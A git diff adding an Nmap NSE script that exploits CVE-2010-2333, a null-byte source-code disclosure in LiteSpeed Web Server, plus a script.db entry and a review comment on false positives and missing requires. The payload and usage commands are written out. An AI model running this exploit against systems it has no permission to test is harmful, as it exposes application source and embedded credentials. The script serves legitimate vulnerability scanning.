diff --git a/scripts/http-litespeed-sourcecode-download.nse b/scripts/http-litespeed-sourcecode-download.nse
new file mode 100644
index 000000000..2c7bb857d
--- /dev/null
+++ b/scripts/http-litespeed-sourcecode-download.nse
@@ -0,0 +1,66 @@
+description = [[
+http-litespeed-sourcecode-download.nse exploits a null-byte poisoning vulnerability in Litespeed Web Servers 4.0.x before 4.0.15 to retrieve the target script's source code by sending a HTTP request with a null byte followed by a .txt file extension (CVE-2010-2333).
+
+If the server is not vulnerable it returns an error 400. If index.php is not found, you may try /phpinfo.php which is also shipped with LiteSpeed Web Server. The attack payload looks like this:
+* /index.php\00.txt
+
+References:
+* http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2333
+* http://www.exploit-db.com/exploits/13850/
+]]
+
+---
+-- @usage
+-- nmap -p80 --script http-litespeed-sourcecode-download --script-args http-litespeed-sourcecode-download.uri=/phpinfo.php
+-- nmap -p8088 --script http-litespeed-sourcecode-download
+--
+-- @output
+-- PORT STATE SERVICE REASON
+-- 8088/tcp open radan-http syn-ack
+-- | http-litespeed-sourcecode-download.nse: /phpinfo.php source code:
+-- |
+-- |
+-- |
+-- |
+-- |_
+--
+-- @args http-litespeed-sourcecode-download.uri URI path to remote file
+---
+
+author = "Paulino Calderon"
+license = "Same as Nmap--See http://nmap.org/book/man-legal.html"
+categories = {"vuln", "intrusive", "exploit"}
+
+require "http"
+require "shortport"
+
+portrule = shortport.http
+
+action = function(host, port)
+ local output = {}
+ local rfile = stdnse.get_script_args("http-litespeed-sourcecode-download.uri") or "/index.php"
+
+ stdnse.print_debug(1, "%s: Trying to download the source code of %s", SCRIPT_NAME, rfile)
+ --we append a null byte followed by ".txt" to retrieve the source code
+ local req = http.get(host, port, rfile.."\00.txt")
+
+ --If we don't get status 200, the server is not vulnerable
+ if req.status then
+ if req.status ~= 200 then
+ if req.status == 400 and nmap.verbosity() >= 2 then
+ output[#output+1] = "Request with null byte did not work. This web server might not be vulnerable"
+ elseif req.status == 404 and nmap.verbosity() >= 2 then
+ output[#output+1] = string.format("Page: %s was not found. Try with an existing file.", rfile)
+ end
+ stdnse.print_debug(2, "%s:Request status:%s body:%s", SCRIPT_NAME, req.status, req.body)
+ else
+ output[#output+1] = "\nLitespeed Web Server Source Code Disclosure (CVE-2010-2333)"
+ output[#output+1] = string.format("%s source code:", rfile)
+ output[#output+1] = req.body
+ end
+ end
+
+ if #output>0 then
+ return stdnse.strjoin("\n", output)
+ end
+end
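Review bot: The `else` branch at the end of `action` reports CVE-2010-2333 for any 200 response without looking at the body, so a server that answers 200 to unknown paths (a catch-all handler or a soft-404 page) would be flagged as vulnerable and have its HTML printed as "source code". Confirming that the body looks like unprocessed script before reporting would cut these false positives, for example `elseif req.body and req.body:find("<?", 1, true) then`, with a verbose-only "not confirmed" line otherwise. The full `req.body` also goes into the scan output, and application source can carry credentials, so the description should say that reports from this script need to be handled as sensitive. Separately, `stdnse` and `nmap` are used but only `http` and `shortport` are required, so the script presumably relies on them being loaded as a side effect; adding `require "stdnse"` and `require "nmap"` makes the dependency explicit.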
diff --git a/scripts/script.db b/scripts/script.db
index 07203b8f1..8919d2fdc 100644
--- a/scripts/script.db
+++ b/scripts/script.db
@@ -79,6 +79,7 @@ Entry { filename = "http-form-brute.nse", categories = { "auth", "intrusive", }
Entry { filename = "http-google-malware.nse", categories = { "discovery", "external", "malware", "safe", } }
Entry { filename = "http-headers.nse", categories = { "discovery", "safe", } }
Entry { filename = "http-iis-webdav-vuln.nse", categories = { "intrusive", "vuln", } }
+Entry { filename = "http-litespeed-sourcecode-download.nse", categories = { "exploit", "intrusive", "vuln", } }
Entry { filename = "http-majordomo2-dir-traversal.nse", categories = { "exploit", "intrusive", "vuln", } }
Entry { filename = "http-malware-host.nse", categories = { "malware", "safe", } }
Entry { filename = "http-methods.nse", categories = { "default", "safe", } }